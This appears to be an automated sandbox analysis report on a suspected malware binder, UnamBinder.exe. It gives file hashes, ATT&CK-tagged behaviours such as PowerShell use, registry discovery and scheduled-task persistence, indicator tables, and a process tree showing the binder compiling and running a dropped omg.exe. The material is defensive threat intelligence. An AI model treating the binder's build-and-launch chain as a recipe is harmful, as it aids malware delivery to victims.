a90ba5a56422c0d2a41f28da056affd69cc8929e14dcdab1583ec96b50b8e28d

Analysis

max time kernel
188s
max time network
202s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
07/07/2024, 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UnamBinder.exe
Size

9.4MB
MD5

70565dbd654937df2eaefc7c79941169
SHA1

5cb8daf1185704a9772f07dcec2e499149517715
SHA256

a90ba5a56422c0d2a41f28da056affd69cc8929e14dcdab1583ec96b50b8e28d
SHA512

64b89f77d6528c838c0288c59203455ea3318028816d4426f818c6b8c3258d8e5e13242b175d7b3402547cfd5a0acddb212b9f9b5bbf5d259cd4befc2d078a4c
SSDEEP

196608:g81oBGyk1BK5Gf01Up2GRlRaNqg4eS+wDjxx1ohqsIOGvuQdaQ:g46GykqGf5sGRT2qFP+GDAqkG2i

Score

7^/10

execution

Malware Config

Signatures

Executes dropped EXE 7 IoCs

pid	Process
2532	windres.exe
2060	gcc.exe
3444	cc1.exe
2664	tcc.exe
932	omg.exe
5000	UnamBinder.exe
4672	UnamBinder.exe

Loads dropped DLL 11 IoCs

pid	Process
2060	gcc.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
3444	cc1.exe
2664	tcc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2280	powershell.exe
4368	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133648274465932399"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1672260578-815027929-964132517-1000_Classes\NotificationData	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000a85856771100557365727300640009000400efbec5522d60e75839602e0000006c0500000000010000000000000000003a000000000019b3940055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5000310000000000a858b67910004c6f63616c003c0009000400efbea8585677e75839602e000000715702000000010000000000000000000000000000006f84c6004c006f00630061006c00000014000000	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000e7760a3858a1da0146815e3a58a1da01169be45e58a1da0114000000	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	UnamBinder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	UnamBinder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000a858567712004170704461746100400009000400efbea8585677e75839602e0000005d57020000000100000000000000000000000000000007c988004100700070004400610074006100000016000000	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	UnamBinder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000a858c57d100041646d696e003c0009000400efbea8585677e75839602e00000052570200000001000000000000000000000000000000a6376100410064006d0069006e00000014000000	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	UnamBinder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	UnamBinder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	UnamBinder.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	UnamBinder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff	UnamBinder.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4368	powershell.exe
2280	powershell.exe
4368	powershell.exe
2280	powershell.exe
2272	chrome.exe
2272	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2492	UnamBinder.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeShutdownPrivilege	2272	chrome.exe
Token: SeCreatePagefilePrivilege	2272	chrome.exe
Token: SeDebugPrivilege	1028	firefox.exe
Token: SeDebugPrivilege	1028	firefox.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
1028	firefox.exe
1028	firefox.exe
1028	firefox.exe
1028	firefox.exe

Suspicious use of SendNotifyMessage 15 IoCs

pid	Process
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
2272	chrome.exe
1028	firefox.exe
1028	firefox.exe
1028	firefox.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
2492	UnamBinder.exe
932	omg.exe
3296	MiniSearchHost.exe
1028	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 4948	2492	UnamBinder.exe	78
PID 2492 wrote to memory of 4948	2492	UnamBinder.exe	78
PID 4948 wrote to memory of 2532	4948	cmd.exe	80
PID 4948 wrote to memory of 2532	4948	cmd.exe	80
PID 4948 wrote to memory of 2532	4948	cmd.exe	80
PID 2532 wrote to memory of 4952	2532	windres.exe	81
PID 2532 wrote to memory of 4952	2532	windres.exe	81
PID 2532 wrote to memory of 4952	2532	windres.exe	81
PID 4952 wrote to memory of 2060	4952	cmd.exe	82
PID 4952 wrote to memory of 2060	4952	cmd.exe	82
PID 4952 wrote to memory of 2060	4952	cmd.exe	82
PID 2060 wrote to memory of 3444	2060	gcc.exe	83
PID 2060 wrote to memory of 3444	2060	gcc.exe	83
PID 2060 wrote to memory of 3444	2060	gcc.exe	83
PID 2492 wrote to memory of 2664	2492	UnamBinder.exe	85
PID 2492 wrote to memory of 2664	2492	UnamBinder.exe	85
PID 932 wrote to memory of 2280	932	omg.exe	91
PID 932 wrote to memory of 2280	932	omg.exe	91
PID 932 wrote to memory of 2280	932	omg.exe	91
PID 932 wrote to memory of 4368	932	omg.exe	93
PID 932 wrote to memory of 4368	932	omg.exe	93
PID 932 wrote to memory of 4368	932	omg.exe	93
PID 932 wrote to memory of 5000	932	omg.exe	95
PID 932 wrote to memory of 5000	932	omg.exe	95
PID 932 wrote to memory of 4672	932	omg.exe	96
PID 932 wrote to memory of 4672	932	omg.exe	96
PID 2272 wrote to memory of 2664	2272	chrome.exe	105
PID 2272 wrote to memory of 2664	2272	chrome.exe	105
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 1564	2272	chrome.exe	106
PID 2272 wrote to memory of 2736	2272	chrome.exe	107
PID 2272 wrote to memory of 2736	2272	chrome.exe	107
PID 2272 wrote to memory of 4656	2272	chrome.exe	108
PID 2272 wrote to memory of 4656	2272	chrome.exe	108
PID 2272 wrote to memory of 4656	2272	chrome.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe
"C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Windows\SYSTEM32\cmd.exe
  "cmd" cmd /c "C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -F pe-i386
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4948
- - C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe
    C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -F pe-i386
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED resource.rc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4952
    - - C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc.exe
        
        C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED resource.rc
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2060
      - C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
        
        "C:/Users/Admin/Desktop/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Desktop/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "resource.rc" "-mtune=generic" "-march=x86-64"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3444
- C:\Users\Admin\Desktop\Compilers\tinycc\tcc.exe
  "C:\Users\Admin\Desktop\Compilers\tinycc\tcc.exe" -Wall -Wl,-subsystem=windows "C:\Users\Admin\Desktop\omg.c" resource.o -luser32 -lshell32 -m32
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2664

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3448

C:\Users\Admin\Desktop\omg.exe
"C:\Users\Admin\Desktop\omg.exe"
1⤵
- Executes dropped EXE
